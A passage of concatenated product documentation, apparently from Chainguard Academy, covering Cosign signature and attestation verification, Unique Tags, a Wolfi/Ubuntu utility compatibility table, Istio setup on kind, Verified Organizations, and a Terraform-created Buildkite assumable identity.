(software bills of materials) which enable users to confirm the origin of each image built and have a detailed list of everything that is packed within. This guide outlines how you can use Cosign to download and verify container image signatures and attestations. Prerequisites The following examples require Cosign and jq to be installed on your machine in order to download and verify image attestations. Registry and Tags for Chainguard Containers Attestations are provided per image build, so you’ll need to specify the correct tag and registry when pulling attestations from an image with cosign. This guide works with Chainguard’s public and private registries: cgr.dev/chainguard: The public registry contains Chainguard’s Starter container images, which typically comprise the :latest versions of an image. cgr.dev/YOUR-ORGANIZATION: A private/dedicated registry contains your organization’s Production container images, which include all versioned tags of an image and special images that are not available in the public registry (including FIPS images and other custom builds). The commands listed on this page will default to the :latest tag, but you can specify a different tag to fetch attestations for. Chainguard’s Signing Identities Chainguard uses an identity associated with its official GitHub account to sign images in the public registry that contains the free tier of Starter images. 
For private images, Chainguard signs all images in your private registry with one of two different identities in your organization: The catalog_syncer identity is used to sign images that have been imported directly from the Chainguard Containers catalog. The apko_builder identity is used to sign any images that have been customized for your organization, such as those built with Custom Assembly. These identities are created and added to every verified Chainguard organization automatically. To follow along with the Private Registry examples in this guide, you will need the unique identifier paths (UIDPs) of these Chainguard identities. To this end, create a few environment variables, the first of which should point to the name of your Chainguard organization: PARENT=your-organization Next, create two more variables to hold the UIDPs of your organization’s catalog_syncer and apko_builder identities, respectively: CATALOG_SYNCER=$(chainctl iam account-associations describe $PARENT -o json | jq -r '.[].chainguard.service_bindings.CATALOG_SYNCER') APKO_BUILDER=$(chainctl iam account-associations describe $PARENT -o json | jq -r '.[].chainguard.service_bindings.APKO_BUILDER') The Private Registry examples in this guide will include these environment variables, allowing you to verify that they were used to sign the given image. Be aware that you can also find these values in the Chainguard Console. After logging in, click on Settings, and then Users. From there, scroll or search for either catalog_syncer or apko_builder and click on its row to find the identity’s UIDP: Verifying Container Image Signatures Chainguard Containers are signed using Sigstore and you can check the included signatures using cosign. The cosign verify command will pull detailed information about all signatures found for the provided image. Public Registry IMAGE=go cosign verify \ --certificate-oidc-issuer=https://token.actions.githubusercontent.com \ --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \ cgr.dev/chainguard/${IMAGE} | jq Private/Dedicated Registry IMAGE=go cosign verify \ --certificate-oidc-issuer=https://issuer.enforce.dev \ --certificate-identity-regexp="https://issuer.enforce.dev/(${CATALOG_SYNCER}|${APKO_BUILDER})" \ cgr.dev/${PARENT}/${IMAGE} | jq Be aware that you will need to change the IMAGE environment variable to reflect a container image your organization is entitled to. Note: The environment variables used in this command (other than ${IMAGE}) were created in the previous section. By default, this command will fetch signatures for the :latest tag. If you’d like, you can specify the tag you want to fetch signatures for: IMAGE=go TAG=1.23.8 cosign verify \ --certificate-oidc-issuer=https://issuer.enforce.dev \ --certificate-identity-regexp="https://issuer.enforce.dev/(${CATALOG_SYNCER}|${APKO_BUILDER})" \ cgr.dev/${PARENT}/${IMAGE}:${TAG} | jq Downloading Container Attestations Attestations are signed metadata about the artifact, which can include SBOMs, vulnerability scans, or other custom predicates. The attestations for a container image can be obtained and verified using Cosign. These are a few of the existing types: Attestation Type Description https://slsa.dev/provenance/v1 The SLSA 1.0 provenance attestation contains information about the image build environment. https://apko.dev/image-configuration Contains the configuration used by that particular image build, including direct dependencies, user accounts, and entry point. 
https://spdx.dev/Document Contains the image SBOM in SPDX format. To download an attestation, use the cosign download attestation command and provide both the predicate-type and the build platform. By default, this command will fetch the SBOM assigned to the latest tag. You can also specify the tag you want to fetch the attestation from. To download a different attestation, replace the --predicate-type parameter value with the desired attestation URL identifier. To illustrate, the following examples will obtain the SBOM for the requested image for the linux/amd64 platform. Public Registry IMAGE=go cosign download attestation \ --predicate-type=https://spdx.dev/Document \ --platform=linux/amd64 \ cgr.dev/chainguard/${IMAGE} | jq -r .payload | base64 -d | jq .predicate Private/Dedicated Registry IMAGE=go cosign download attestation \ --predicate-type=https://spdx.dev/Document \ --platform=linux/amd64 \ cgr.dev/${PARENT}/${IMAGE} | jq -r .payload | base64 -d | jq .predicate Verifying Image Attestations You can use the cosign verify-attestation command to check the signatures of the desired container image attestations: Public Registry IMAGE=go cosign verify-attestation \ --type https://spdx.dev/Document \ --certificate-oidc-issuer=https://token.actions.githubusercontent.com \ --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \ cgr.dev/chainguard/${IMAGE} | jq This will pull in the signature for the attestation specified by the --type parameter, which in this case is the SPDX attestation for SBOMs. You will get output that verifies the SBOM attestation signature in Cosign’s transparency log: Verification for cgr.dev/chainguard/go -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - The code-signing certificate was verified using trusted certificate authority certificates Certificate subject: https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main Certificate issuer URL: https://token.actions.githubusercontent.com GitHub Workflow Trigger: schedule GitHub Workflow SHA: da283c26829d46c2d2883de5ff98bee672428696 GitHub Workflow Name: .github/workflows/release.yaml GitHub Workflow Repository: chainguard-images/images GitHub Workflow Ref: refs/heads/main ... Private/Dedicated Registry IMAGE=go cosign verify-attestation \ --type https://spdx.dev/Document \ --certificate-oidc-issuer=https://issuer.enforce.dev \ --certificate-identity-regexp="https://issuer.enforce.dev/(${CATALOG_SYNCER}|${APKO_BUILDER})" \ cgr.dev/${PARENT}/${IMAGE} | jq Note About the Examples in this Guide The examples in this guide invariably pass command output through jq, a JSON processor. This is helpful, as it makes the output more easily readable. However, if you’re running these commands in a script, this can cause problems if validation fails. For example, if Cosign returns an error but it is passed into jq, then jq will overwrite the exit codes from Cosign, causing them to be silently ignored. To avoid this problem, you could include either or both of the following set options in your script: set -e ensures that your script exits with an error if any of the commands in your script exit with an error. set -o pipefail ensures that status codes from Cosign aren’t masked when piped to jq.
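For example, a verification step in a script might start like this minimal sketch (a hypothetical CI snippet that reuses the public-registry command shown above):

```sh
#!/usr/bin/env bash
# Fail the script if cosign fails, and don't let jq mask cosign's exit code.
set -e
set -o pipefail

IMAGE=go
cosign verify \
  --certificate-oidc-issuer=https://token.actions.githubusercontent.com \
  --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \
  "cgr.dev/chainguard/${IMAGE}" | jq
```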
Learn more To get up to speed with Sigstore, you can review the Sigstore section of Chainguard Academy, visit the upstream Sigstore Docs site, and check out the Sigstore organization on GitHub. You can learn more about verifying software artifacts with Cosign by reading How to Verify File Signatures with Cosign. Navigate to our container images landing page or Getting Started Guides to understand more about Chainguard Containers and how they offer low-to-zero CVEs. --- ### Unique Tags for Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/unique-tags/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product Some organizations use image tags as an indication that there is a new container image available in a registry. Oftentimes, these organizations’ internal automation and policies expect each new build to have its own distinct tag. To help with cases like this, Chainguard offers Unique Tags for private registries. Unique Tags are ideal for organizations that require a strict tag per release or update of their images. They benefit teams looking for precise tracking and management of container images. Unique Tags are an opt-in feature that is only available for private registries. If your organization is interested in using Unique Tags, please contact support and we will enable this feature for you. This guide provides an overview of what these Unique Tags are, the kinds of problems they aim to solve, and how you can access them in the Chainguard Console. Chainguard’s Unique Tags Unique Tags are only available for private registries, as Chainguard’s public registry only has the :latest or, in some cases, the :latest-dev tags available. Because Unique Tags are an opt-in feature, customers have the flexibility to enable them based on their specific operational and security requirements. Chainguard’s Unique Tags end in a timestamp, such as 20240229, which indicates the date when the Container was built. Because Chainguard Containers are rebuilt whenever there is a change to an included package, the timestamp ensures that the specific tag will always represent that specific container image build and not another. One benefit of using this timestamp scheme with Unique Tags is that it can help users to quickly identify when a given version of a container image was built. It also helps to make them human-readable, as opposed to the long, unpronounceable strings that make up container image digests. Unique Tags also allow for individual image repositories within a registry to be included or excluded as needed. For example, if you have an application that requires a specific tagging scheme to be compatible with an existing Helm chart, you can enable Unique Tags for your registry, but exclude that specific repository so that its container images only receive the standard tags. This granular level of control ensures that organizations can implement unique tagging in a way that best suits their specific needs. It offers a tailored approach to image management, allowing for precise and efficient tracking of image versions and builds across different environments. Additionally, the Unique Tags feature is integrated with Chainguard’s Tag History API and event notifications. These integrations allow you to track changes over time. How do I find Unique Tags? After signing into the Chainguard Console, click on Organization images in the left-hand navigation.
This will take you to your organization’s container images directory where you’ll be presented with a list of all the Chainguard Production container images you can access. To the right of the search box and Category drop-down menu there’s a filter button labeled Visible tags. Click on that button, and you’ll see a drop-down menu with two options: Epoch tags and Unique tags. Toggle Unique tags to see the Unique Tags available for your organization’s container images. By toggling this button on, each individual container image’s details page will show the Unique Tags available for it. To illustrate, toggle this button on and then click on any paid Production container image listed in your organization’s directory. The “Version” column will now show the Unique Tags available for that container image. These tags include a timestamp in the format YYYYMMDDHHMM, and may include a prefix to help identify and parse the tag name programmatically. Here there are a number of container image versions with tags similar to :openjdk-17-202412120223. This means that this particular version of the container image was last updated on December 12, 2024, at 2:23 AM. You can use this version’s Pull URL (cgr.dev/$ORGANIZATION/jdk-fips:openjdk-17-202412120223) to download this container image, and you can be confident that this Pull URL will always refer to the same container image. Learn More It should be noted that by their design, container image tags are mutable, meaning that they can change over time. Although Unique Tags are meant to serve as a secure solution for teams whose internal workflows assume tag immutability, we still recommend that users pull container images by their digests whenever possible. Check out the “Pulling by Digest” section of our guide on How to Use Chainguard Containers for more information. You may also find our video on How to Use Container Image Digests to Improve Reproducibility to be useful. Additionally, you may find our three-part blog series on Chainguard’s image tagging philosophy to be of interest. Part 1 Part 2 Part 3 --- ### Ubuntu Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/ubuntu-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Ubuntu base images have different binaries and scripts included in their respective busybox and coreutils packages. The following table lists common tools and their corresponding package(s) in both Wolfi and Ubuntu distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Ubuntu. You can use the apk search command in Wolfi, and the apt-cache search command in Ubuntu to find out which package includes a tool. 
Utility Wolfi busybox Ubuntu busybox Wolfi coreutils Ubuntu coreutils [ ✅ ✅ ✅ ✅ [[ ✅ ✅ acpid ✅ add-shell ✅ addgroup ✅ adduser ✅ adjtimex ✅ ✅ ar ✅ arch ✅ ✅ ✅ arp ✅ arping ✅ ✅ ash ✅ ✅ awk ✅ ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ basename ✅ ✅ ✅ ✅ basenc ✅ ✅ bbconfig ✅ bc ✅ ✅ beep ✅ bin ✅ blkdiscard ✅ blockdev ✅ brctl ✅ bunzip2 ✅ ✅ bzcat ✅ ✅ bzip2 ✅ ✅ cal ✅ ✅ cat ✅ ✅ ✅ ✅ chattr ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ ✅ chmod ✅ ✅ ✅ ✅ chown ✅ ✅ ✅ ✅ chpasswd ✅ ✅ chroot ✅ ✅ ✅ ✅ chrt ✅ chvt ✅ cksum ✅ ✅ ✅ clear ✅ ✅ cmp ✅ ✅ comm ✅ ✅ ✅ coreutils ✅ cp ✅ ✅ ✅ ✅ cpio ✅ ✅ cryptpw ✅ csplit ✅ ✅ cttyhack ✅ cut ✅ ✅ ✅ ✅ date ✅ ✅ ✅ ✅ dc ✅ ✅ dd ✅ ✅ ✅ ✅ deallocvt ✅ delgroup ✅ deluser ✅ depmod ✅ devmem ✅ df ✅ ✅ ✅ ✅ diff ✅ ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ ✅ dmesg ✅ ✅ dnsdomainname ✅ ✅ dos2unix ✅ ✅ du ✅ ✅ ✅ ✅ dumpkmap ✅ dumpleases ✅ echo ✅ ✅ ✅ ✅ ed ✅ egrep ✅ ✅ env ✅ ✅ ✅ ✅ expand ✅ ✅ ✅ ✅ expr ✅ ✅ ✅ ✅ factor ✅ ✅ ✅ ✅ fallocate ✅ ✅ false ✅ ✅ ✅ ✅ fatattr ✅ fgrep ✅ ✅ find ✅ ✅ findfs ✅ flock ✅ fmt ✅ ✅ fold ✅ ✅ ✅ ✅ free ✅ ✅ freeramdisk ✅ fsfreeze ✅ fstrim ✅ fsync ✅ ftpget ✅ ftpput ✅ fuser ✅ getopt ✅ ✅ getty ✅ ✅ grep ✅ ✅ groups ✅ ✅ ✅ gunzip ✅ ✅ gzip ✅ ✅ halt ✅ hd ✅ head ✅ ✅ ✅ ✅ hexdump ✅ ✅ hostid ✅ ✅ ✅ ✅ hostname ✅ ✅ httpd ✅ hwclock ✅ i2cdetect ✅ i2cdump ✅ i2cget ✅ i2cset ✅ id ✅ ✅ ✅ ✅ ifconfig ✅ ifdown ✅ ifup ✅ init ✅ inotifyd ✅ insmod ✅ install ✅ ✅ ✅ ionice ✅ ✅ iostat ✅ ip ✅ ipcalc ✅ ipcrm ✅ ipcs ✅ ipneigh ✅ join ✅ ✅ kill ✅ ✅ killall ✅ ✅ killall5 ✅ klogd ✅ last ✅ less ✅ ✅ link ✅ ✅ ✅ ✅ linux32 ✅ ✅ linux64 ✅ ✅ linuxrc ✅ ln ✅ ✅ ✅ ✅ loadfont ✅ loadkmap ✅ logger ✅ ✅ login ✅ ✅ logname ✅ ✅ ✅ logread ✅ losetup ✅ ls ✅ ✅ ✅ ✅ lsattr ✅ lsmod ✅ lsof ✅ lsscsi ✅ lzcat ✅ ✅ lzma ✅ ✅ lzop ✅ ✅ lzopcat ✅ md5sum ✅ ✅ ✅ ✅ md5sum.textutils ✅ mdev ✅ microcom ✅ ✅ mkdir ✅ ✅ ✅ ✅ mkdosfs ✅ mke2fs ✅ mkfifo ✅ ✅ ✅ ✅ mknod ✅ ✅ ✅ ✅ mkpasswd ✅ ✅ mkswap ✅ mktemp ✅ ✅ ✅ ✅ modinfo ✅ modprobe ✅ more ✅ ✅ mount ✅ mountpoint ✅ mpstat ✅ mt ✅ mv ✅ ✅ ✅ ✅ nameif ✅ nc ✅ netstat ✅ ✅ nice ✅ ✅ ✅ nl ✅ ✅ ✅ ✅ nmeter ✅ nohup ✅ ✅ ✅ nologin ✅ ✅ nproc ✅ ✅ ✅ ✅ nsenter ✅ ✅ nslookup ✅ nuke ✅ numfmt ✅ ✅ od ✅ ✅ ✅ ✅ openvt ✅ partprobe ✅ passwd ✅ paste ✅ ✅ ✅ ✅ patch ✅ pathchk ✅ ✅ pgrep ✅ pidof ✅ ✅ ping ✅ ✅ ping6 ✅ ✅ pinky ✅ ✅ pipe_progress ✅ pivot_root ✅ ✅ pkill ✅ pmap ✅ poweroff ✅ pr ✅ ✅ printenv ✅ ✅ ✅ printf ✅ ✅ ✅ ✅ ps ✅ ✅ pstree ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ ✅ pwdx ✅ rdate ✅ rdev ✅ readahead ✅ readlink ✅ ✅ ✅ ✅ realpath ✅ ✅ ✅ ✅ reboot ✅ remove-shell ✅ renice ✅ ✅ reset ✅ ✅ resize ✅ resume ✅ rev ✅ ✅ rm ✅ ✅ ✅ ✅ rmdir ✅ ✅ ✅ ✅ rmmod ✅ route ✅ rpm ✅ rpm2cpio ✅ run-init ✅ run-parts ✅ ✅ runcon ✅ ✅ sbin ✅ sed ✅ ✅ seq ✅ ✅ ✅ ✅ setkeycodes ✅ setpriv ✅ ✅ setserial ✅ setsid ✅ ✅ sh ✅ ✅ sha1sum ✅ ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ sha512sum ✅ ✅ ✅ ✅ shred ✅ ✅ ✅ ✅ shuf ✅ ✅ ✅ ✅ sleep ✅ ✅ ✅ ✅ sort ✅ ✅ ✅ ✅ split ✅ ✅ ✅ ssl_client ✅ start-stop-daemon ✅ stat ✅ ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ ✅ stty ✅ ✅ ✅ ✅ su ✅ sum ✅ ✅ ✅ svc ✅ svok ✅ swapoff ✅ swapon ✅ switch_root ✅ sync ✅ ✅ ✅ ✅ sysctl ✅ ✅ syslogd ✅ tac ✅ ✅ ✅ ✅ tail ✅ ✅ ✅ ✅ tar ✅ ✅ taskset ✅ tee ✅ ✅ ✅ ✅ telnet ✅ test ✅ ✅ ✅ ✅ tftp ✅ time ✅ ✅ timeout ✅ ✅ ✅ ✅ top ✅ ✅ touch ✅ ✅ ✅ ✅ tr ✅ ✅ ✅ ✅ traceroute ✅ ✅ traceroute6 ✅ ✅ tree ✅ true ✅ ✅ ✅ ✅ truncate ✅ ✅ ✅ ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ✅ ttysize ✅ tunctl ✅ ubirename ✅ udhcpc ✅ udhcpd ✅ uevent ✅ umount ✅ uname ✅ ✅ ✅ ✅ uncompress ✅ unexpand ✅ ✅ ✅ ✅ uniq ✅ ✅ ✅ ✅ unix2dos ✅ ✅ unlink ✅ ✅ ✅ ✅ unlzma ✅ ✅ unlzop ✅ unshare ✅ unxz ✅ ✅ unzip ✅ ✅ uptime ✅ ✅ users ✅ ✅ usleep ✅ ✅ usr ✅ uudecode ✅ ✅ uuencode ✅ ✅ vconfig ✅ ✅ vdir ✅ ✅ vi ✅ ✅ vlock ✅ w ✅ watch ✅ ✅ watchdog ✅ wc ✅ ✅ ✅ ✅ wget ✅ which ✅ ✅ who ✅ ✅ ✅ ✅ whoami ✅ ✅ ✅ ✅ xargs ✅ ✅ 
xxd ✅ ✅ xz ✅ xzcat ✅ ✅ yes ✅ ✅ ✅ ✅ zcat ✅ ✅ --- ### Getting Started with the Chainguard Istio Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/istio/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product Istio extends Kubernetes to establish a programmable, application-aware network using the powerful Envoy service proxy. Working with both Kubernetes and traditional workloads, Istio brings standard, universal traffic management, telemetry, and security to complex deployments. Chainguard offers a set of minimal, security-hardened Istio container images, built on top of the Wolfi OS. We will demonstrate how to get started with the Chainguard Istio container images on an example kind cluster. To get started, you’ll need Docker, kind, kubectl, and istioctl installed. If you are missing any, you can follow the relevant link to get started. Docker kind kubectl istioctl Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Start up a kind cluster First, we’ll start up a kind cluster to install Istio. kind create cluster This will return output similar to the following: Creating cluster "kind" ... ✓ Ensuring node image (kindest/node:v1.27.3) 🖼 ✓ Preparing nodes 📦 ✓ Writing configuration 📜 ✓ Starting control-plane 🕹️ ✓ Installing CNI 🔌 ✓ Installing StorageClass 💾 Set kubectl context to "kind-kind" You can now use your cluster with: kubectl cluster-info --context kind-kind Thanks for using kind! 😊 Following that, you can install the Istio Chainguard Containers with istioctl. Install Istio using Chainguard Containers We will be using the istioctl command to install Istio. In order to use the Chainguard Containers, we will need to set the following values: hub = cgr.dev/$ORGANIZATION Note: Be aware that you will need to change cgr.dev/$ORGANIZATION to reflect the name of your organization’s repository within Chainguard’s registry. tag = latest values.pilot.image = istio-pilot values.global.proxy.image = istio-proxy values.global.proxy_init.image = istio-proxy We can set these values with the following istioctl command: istioctl install --set tag=latest --set hub=cgr.dev/$ORGANIZATION \ --set values.pilot.image=istio-pilot \ --set values.global.proxy.image=istio-proxy \ --set values.global.proxy_init.image=istio-proxy The Istio Chainguard Container is now running on the kind cluster you created previously. In the next section, you’ll set up an Istio gateway and a VirtualService to test out this container.
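Before moving on, you can optionally confirm that the Istio control plane and ingress gateway came up; this quick check is not part of the original walkthrough.

```sh
# The istiod and istio-ingressgateway pods should be Running before you apply
# the Gateway and VirtualService in the next section.
kubectl get pods -n istio-system
```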
Stand up a Gateway and a VirtualService To see the Istio installation in action, we will create two Istio resources: An Istio gateway serving the “http://hello.example.com” domain A VirtualService to always reply with “Hello, world!” to requests to the “http://hello.example.com” domain Create a YAML manifest file with the following contents to define the Istio resources: cat > example.yaml <<EOF apiVersion: networking.istio.io/v1alpha3 kind: Gateway metadata: name: sample-gateway spec: servers: - port: number: 80 name: http protocol: HTTP hosts: - "hello.example.com" --- apiVersion: networking.istio.io/v1alpha3 kind: VirtualService metadata: name: sample-virtual-service spec: gateways: - sample-gateway hosts: - "hello.example.com" http: - directResponse: status: 200 body: string: "Hello, world!\n" EOF Apply the YAML file to the cluster: kubectl apply -f example.yaml Now, in one terminal, start a port-forward to the Istio Ingress Gateway: kubectl port-forward svc/istio-ingressgateway -n istio-system 8080:80 In another terminal, send a request to the Istio Ingress Gateway: curl -H "Host: hello.example.com" localhost:8080 This will return Hello, world! to the terminal output. Clean up your kind cluster Once you are done, you can delete your kind cluster: kind delete cluster This will delete the default cluster context, kind. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Istio Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk add you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as a base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Verified Organizations URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/verified-orgs/ Last Modified: March 21, 2024 Tags: Product, Conceptual Resources on the Chainguard platform are organized in a hierarchical structure called IAM Organizations. Single customers or organizations typically use a single root-level Organization to manage their Chainguard resources. Organizations can optionally be verified. Verification modifies some aspects of the Chainguard platform user experience to help large organizations guide their user base to the correct resources. Verifying your Organization Verification is currently a manual process. To verify your organization, please contact your customer support contact. You can check if your organization is verified using chainctl. chainctl iam organization ls -o json | jq Verified organizations will have a field verified: true set. [ { "id": "f5a2c73d75a8d7fe666ecb623c79a2b771d78765", "name": "example.com", "resourceLimits": { "clusters": 3, "idps": 1 }, "verified": true } ] Verified Organizations and Custom Identity providers If you’ve configured a custom identity provider and your organization is verified, you can select your identity provider by providing the name of your organization when authenticating.
When authenticating with chainctl, the --org-name flag can be passed. Here, the command uses the example organization name example.com. chainctl auth login --org-name example.com As an alternative, you can set the organization name by editing the chainctl configuration file. You can do so with the following command. chainctl config edit This will open a text editor (nano, by default) where you can edit the local chainctl config. Add the following lines to this file.

default:
  org-name: example.com

You can also set this with a single command using the chainctl config set subcommand, as in this example. chainctl config set default.org-name example.com Once set, the configured identity provider will be used automatically any time you run chainctl auth login. When authenticating via the Chainguard Console, your organization name is detected from your email address in most cases. If your organization name does not match your email domain, it can be input manually to select your custom identity provider. Verified Organizations and Chainguard Containers If you’ve purchased Chainguard Containers, your images are available via a private catalog. Your images are available to pull via cgr.dev/<org id>/<image name>, where <org id> is the unique identifier for your organization. Once your organization is verified, you can use the name of your organization instead of your organization identifier. For example, if your organization is named example.com and is verified, you can pull private images from your catalog with cgr.dev/example.com/<image name>. Restrictions for Verified Organizations Once an organization is verified, its name can be used interchangeably with the organization’s unique ID. Changes to the name can break image pulls from your private catalog and break authentication for users that have configured custom identity providers. For that reason, modifying the name of a verified organization is not currently possible. If you need to modify the name of your verified organization, please contact support. --- ### Create an Assumable Identity for a Buildkite Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/buildkite-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then how to update a Buildkite pipeline so that it can assume the identity and interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Buildkite agent and pipeline you can use to test out the identity you’ll create. We recommend following Buildkite’s Getting Started guide to set these up. Creating Terraform Files We will be using Terraform to create an identity for a Buildkite pipeline to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity.
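For orientation, this is the layout you will end up with; the file names and purposes below come from this guide, and the directory name matches the one created in the next step.

```bash
# Expected layout after completing this section (the files are created below).
# buildkite-id/
# ├── main.tf       # declares the Chainguard Terraform provider
# ├── sample.tf     # looks up the Chainguard organization to work within
# └── buildkite.tf  # creates the assumable identity and its role-binding
```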
To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/buildkite-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the buildkite.tf file — to access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, buildkite.tf. buildkite.tf The buildkite.tf file is what will actually create the identity for your Buildkite workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "buildkite" { parent_id = data.chainguard_group.group.id name = "buildkite" description = <<EOF This is an identity that authorizes Buildkite workflows for this pipeline to assume to interact with chainctl. EOF claim_match { issuer = "https://agent.buildkite.com" subject_pattern = "organization:<organization-name>:pipeline:<pipeline-name>:ref:refs/heads/main:commit:[0-9a-f]+:step:" } } First, this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named buildkite and has a brief description. The most important part of this section is the claim_match. When the Buildkite workflow tries to assume this identity later on, it must present a token matching the issuer and subject specified here in order to do so. The issuer is the entity that creates the token, while the subject is the entity (here, the Buildkite pipeline build) that the token represents. In this case, the issuer field points to https://agent.buildkite.com, the issuer of JWT tokens for Buildkite pipelines. Instead of pointing to a literal value with a subject field, though, this file points to a regular expression using the subject_pattern field. When you run a Buildkite pipeline, it generates a unique commit for each build. Passing the regular expression [0-9a-f]+ allows you to generate an identity that will work for every build from this pipeline. You may refer to the official Buildkite documentation for more details on how Buildkite issuer and subject claims can be formatted to suit your specific needs. For the purposes of this guide, though, you will need to replace <organization-name> and <pipeline-name> with the name of your Buildkite organization and the name of your Buildkite pipeline. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. 
output "buildkite-identity" { value = chainguard_identity.buildkite.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.buildkite.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. First, though, you’ll need to log in to chainctl to ensure that Terraform can create the Chainguard resources. chainctl auth login Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + buildkite-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output an buildkite-identity value. ... Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: buildkite-identity = "<your buildkite identity>" This is the identity’s UIDP (unique identity path), which you configured the buildkite.tf file to emit in the previous section. Note this value down, as you’ll need it when you test this identity using a Buildkite workflow. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls You’re now ready to edit a Buildkite pipeline in order to test out this identity. Testing the identity with a Buildkite pipeline To test the identity you created with Terraform in the previous section, navigate to your Buildkite pipeline. From the Buildkite Dashboard, click Pipelines in the top navigation bar and then click on the pipeline you specified in the buildkite.tf file. From there, click the Edit Steps button to add the following commands to a step in your pipeline. Be sure to replace <your buildkite identity> with the identity UIDP you noted down in the previous section. - command: | curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m)" chmod +x chainctl token=$(buildkite-agent oidc request-token --audience issuer.enforce.dev) ./chainctl auth login --identity-token $token --identity <your buildkite identity> ./chainctl auth configure-docker --identity-token $token --identity <your buildkite identity> ./chainctl images repos list docker pull cgr.dev/<organization>/<repo>:<tag> These commands will cause your Buildkite pipeline to download chainctl and make it executable. It will then sign in to Chainguard using the Buildkite identity you generated previously. 
